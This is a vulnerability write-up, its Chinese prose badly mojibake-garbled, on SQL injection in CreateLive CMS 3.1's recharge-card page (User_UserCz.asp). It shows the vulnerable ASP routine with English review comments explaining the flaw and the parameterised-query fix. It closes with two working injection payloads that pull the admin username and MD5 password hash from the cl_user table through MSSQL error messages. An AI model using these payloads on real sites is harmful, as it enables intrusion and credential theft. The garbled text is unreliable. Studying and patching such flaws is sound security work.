CreateLive CMS 3.1 注入漏洞

俴12·ݵ鿯CreateLive CMS 4.2ע©ǳиҲCreateLive CMSϵͳģǰ汾3.1ģӦҲɣ
     վǿעġʼɣ
 
  עļuser/User_UserCz.asp,ڶchkCzNumУCzNumCzUserPassûй˾ͱѯУγע©©ʹע빤߲½⣬Ҫԭ֤ʹPOSTύش:
 
 
  ' chkCzNum: looks up a recharge record in Cl_UserCz by the submitted CzNum and
  ' Pass values and rejects the request if no row matches or the row is already
  ' marked as used. Only the first part of the Sub is shown on this page.
  '
  ' SECURITY (review): CzNum and Pass come straight from the request and are
  ' concatenated into the SQL text below with no quoting, type check or
  ' parameter binding. This is the SQL injection the page describes.
  Sub chkCzNum()
 Dim CzUser,Self,CzNum,Pass
 Dim sPoint,sPointAll,sDayNum,sDayNumAll
 Dim rsUser,ChargeType
 ' request("x") without a collection name searches QueryString, Form, Cookies,
 ' ClientCertificate and ServerVariables in that order, so every one of these
 ' values is attacker-controlled regardless of HTTP method.
 ' Trim() only strips leading/trailing spaces; it is not input validation.
 CzUser = Trim(request("CzUser"))
 Self = Trim(request("Self"))
 CzNum = Trim(request("CzNum"))
 Pass = Trim(request("Pass"))
 ' Presence check only: nothing here confirms the values are numeric or bounded.
 if CzNum="" or Pass="" then
  Call Cl.OutMsg("ֵŻֵ벻Ϊգ","User_UserCz.asp")
 end if
 ' Cl.CodeIsTrue is not shown; presumably a verification-code (CAPTCHA) check.
 ' It gates the request but does nothing to sanitise CzNum/Pass.
 if Not Cl.CodeIsTrue(Trim(request("ChkPlusCz")),"ChkPlusCz") then
  Call Cl.OutMsg("֤벻ȷ","User_UserCz.asp")
 end if
 ' NOTE(review): the code after each OutMsg call assumes OutMsg ends the
 ' response; if it returns, execution falls through to the query. Confirm.
 dim rsCz
 set rsCz=Server.CreateObject("Adodb.RecordSet")
 ' VULNERABLE: user input is spliced into the statement as raw SQL. The values
 ' are unquoted, which suggests numeric columns (schema not shown; confirm).
 ' Fix: validate both values as numbers before use, or better, run the query
 ' through an ADODB.Command with bound parameters instead of string building.
 ' Also avoid returning raw database error text to the client.
 ' Open arguments 1,3 = adOpenKeyset cursor, adLockOptimistic lock.
 OpenConn : rsCz.open "Select * from Cl_UserCz where CzNum="&CzNum&" and Pass="&Pass&"",Conn,1,3
 ' Empty recordset: no row matched the submitted number/password pair.
 if rsCz.bof and rsCz.eof then
  rsCz.close:set rsCz=Nothing
  Call Cl.OutMsg("ڴ˳ֵ룡","User_UserCz.asp")
 End if
 sPoint =rsCz("Point")
 sDayNum =rsCz("DayNum")
 ' A non-zero IsUser value is treated as "already used" and the request is refused.
 if rsCz("IsUser")<>0 then
  rsCz.close:set rsCz=Nothing
  Call Cl.OutMsg("óֵѱʹã","User_UserCz.asp")
 end if
 ' (The listing on this page stops here; the remainder of the Sub is not shown.)
 
  ڡֵֵ룬ڡֵšעͿȻֵť


ش󣬿ȷݿmssql
 
  Ҫcl_admincl_userû,cl_adminǹԱıֶusername,passwordcl_userû,ֶκ͹Աıһ
 
  3 and 1=(select username from cl_user where userid=1);--    һûAdmin

3 and 1=(select userpassword from cl_user where userid=1);--   AdminûΪmd5

ݱûе¼